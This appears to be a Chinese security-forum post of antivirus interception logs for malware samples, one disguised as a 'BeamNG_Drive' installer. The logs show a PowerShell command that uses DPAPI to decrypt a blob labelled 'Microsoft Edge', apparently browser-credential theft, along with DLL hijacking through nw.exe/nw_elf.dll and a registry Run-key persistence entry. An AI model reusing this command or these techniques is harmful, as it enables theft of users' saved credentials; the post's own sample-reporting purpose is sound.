本帖最后由 sanhu35 于 2023-9-18 14:22 编辑
CrazydownnSettup
行为: 创建进程
拦截规则: [结束]脚本攻击(执行)
响应动作: 询问(允许)
拦截时间: 2023-09-18 14:06:50
拦截次数: 1
进程名称: cmd.exe
进程路径: C:\Windows\System32\cmd.exe
进程命令行: C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,124,153,72,131,159,122,226,72,168,20,106,101,32,54,16,127,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,162,233,42,151,218,251,252,36,168,64,156,77,206,47,236,11,176,183,114,103,219,9,88,55,113,45,131,124,73,60,130,168,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,232,128,28,83,236,8,146,107,5,237,29,140,250,232,10,225,57,11,38,212,104,103,84,187,90,250,188,47,105,129,82,79,48,0,0,0,33,192,27,133,66,135,38,236,76,241,52,242,169,89,112,121,91,73,156,106,243,226,189,201,193,5,46,77,248,40,150,59,212,63,202,52,72,133,14,135,149,246,199,97,108,91,27,158,64,0,0,0,0,43,111,61,1,191,91,37,171,226,185,234,53,226,26,113,112,201,0,253,182,166,88,250,79,124,11,183,78,135,71,18,139,236,19,253,154,94,108,193,137,178,44,234,170,119,35,98,79,87,131,166,224,29,203,193,237,209,129,49,11,225,171,93), $null, 'CurrentUser')"
操作目标: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
DualCorps.exe
File_ BeamNG_Drive.exe
黑DLL
木马名称:Trojan.Generic
所在路径:C:\USERS\ADMINISTRATOR\APPDATA\ROAMING\COPY\NW_ELF.DLL
白程序
动作:动态链接库劫持
路径:C:\Users\Administrator\AppData\Roaming\Copy\nw.exe
持久化
行为: 设置注册表值
拦截规则: 智能防护(添加开机启动)
响应动作: 询问(允许)
进程名称: File_ BeamNG_Drive.exe
进程路径: C:\Users\Administrator\Desktop\File_ BeamNG_Drive.exe
进程命令行: "C:\Users\Administrator\Desktop\File_ BeamNG_Drive.exe"
操作目标: HKEY_USERS\S-1-5-21-1371736503-2317628717-3822715350-500\Software\Microsoft\Windows\CurrentVersion\Run|Copy=C:\Users\Administrator\AppData\Roaming\Copy\nw.exe
|